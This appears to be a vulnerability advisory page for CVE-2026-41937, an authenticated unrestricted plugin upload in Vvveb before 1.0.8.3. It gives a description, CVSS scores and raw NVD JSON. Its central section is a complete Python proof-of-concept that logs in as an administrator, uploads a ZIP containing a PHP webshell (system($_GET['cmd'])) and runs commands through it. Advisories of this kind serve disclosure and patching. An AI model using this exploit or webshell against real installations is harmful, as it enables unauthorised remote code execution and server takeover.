Security Vulnerability Report
CVE-2026-41937 CVSS 7.2 HIGH

CVE-2026-41937

Published: 2026-05-14 15:16:46
Last Modified: 2026-05-14 16:24:56

Description

Vvveb before 1.0.8.3 contains an unrestricted file upload vulnerability in the plugin upload endpoint that allows an authenticated super_admin user to execute arbitrary PHP code by uploading a malicious plugin ZIP file. An attacker holding that role can craft a ZIP containing a plugin.php with a valid Slug header and a public/index.php file with arbitrary PHP code; once installed, that file executes as the web server user when it is reached via unauthenticated HTTP requests to the plugin's public path.

CVSS Details

CVSS v3.1 Base Score
7.2 (the raw record below also carries a CVSS v4.0 base score of 8.6, HIGH)
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No structured configuration data is available; the affected version range stated in the description is:

Vvveb < 1.0.8.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept (PoC) for CVE-2026-41937 # This script demonstrates the exploitation of the unrestricted file upload in Vvveb. # Usage: python poc.py <target_url> <username> <password> import requests import zipfile import io import sys def create_malicious_zip(): # Create a malicious ZIP file in memory zip_buffer = io.BytesIO() with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zip_file: # 1. plugin.php with valid Slug header plugin_content = """<?php /* Plugin Name: Evil Plugin Slug: evil-plugin Version: 1.0 */ // This file is required for the plugin structure ?>""" zip_file.writestr('plugin.php', plugin_content) # 2. public/index.php with arbitrary PHP code (webshell) shell_content = """<?php system($_GET['cmd']); ?>""" zip_file.writestr('public/index.php', shell_content) zip_buffer.seek(0) return zip_buffer def exploit(target_url, username, password): session = requests.Session() # Step 1: Login as super_admin (Authentication details depend on target config) login_url = f"{target_url}/index.php?module=admin/login" # Note: Adjust payload based on actual login form structure login_data = { 'email': username, 'password': password, 'login': 'login' } print(f"[*] Logging in to {login_url}...") try: r = session.post(login_url, data=login_data) if 'dashboard' not in r.text.lower() and 'admin' not in r.text.lower(): print("[-] Login failed or session token unknown.") return except Exception as e: print(f"[-] Error during login: {e}") return # Step 2: Upload the malicious plugin upload_url = f"{target_url}/index.php?module=admin/plugins&action=install" files = { 'file': ('evil_plugin.zip', create_malicious_zip(), 'application/zip') } print(f"[*] Uploading malicious plugin to {upload_url}...") try: r = session.post(upload_url, files=files) print(f"[*] Upload response status: {r.status_code}") except Exception as e: print(f"[-] Error during upload: {e}") return # Step 3: Trigger the RCE # The plugin slug is 'evil-plugin', so the path is usually 
/plugins/evil-plugin/public/index.php shell_url = f"{target_url}/plugins/evil-plugin/public/index.php" print(f"[*] Triggering payload at {shell_url}?cmd=whoami...") try: r = session.get(f"{shell_url}?cmd=whoami") if r.status_code == 200: print("[+] Exploit successful! Command output:") print(r.text) else: print(f"[-] Failed to execute code. Status: {r.status_code}") except Exception as e: print(f"[-] Error triggering payload: {e}") if __name__ == "__main__": if len(sys.argv) != 4: print("Usage: python poc.py <url> <user> <pass>") sys.exit(1) exploit(sys.argv[1], sys.argv[2], sys.argv[3])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41937", "sourceIdentifier": "[email protected]", "published": "2026-05-14T15:16:46.190", "lastModified": "2026-05-14T16:24:56.240", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vvveb before 1.0.8.3 contains an unrestricted file upload vulnerability in the plugin upload endpoint that allows super_admin users to execute arbitrary PHP code by uploading a malicious plugin ZIP file. Attackers can craft a ZIP containing a plugin.php with a valid Slug header and a public/index.php file with arbitrary PHP code, which executes as the web server user when accessed via unauthenticated HTTP requests to the plugin's public path."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-61"}, {"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://github.com/givanz/Vvveb/commit/04f0294350ec429e307cd31c2e777a4797c868d6", "source": "[email protected]"}, {"url": "https://github.com/givanz/Vvveb/releases/tag/1.0.8.3", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/vvveb-unrestricted-file-upload-rce-via-plugin-upload", "source": "[email protected]"}]}}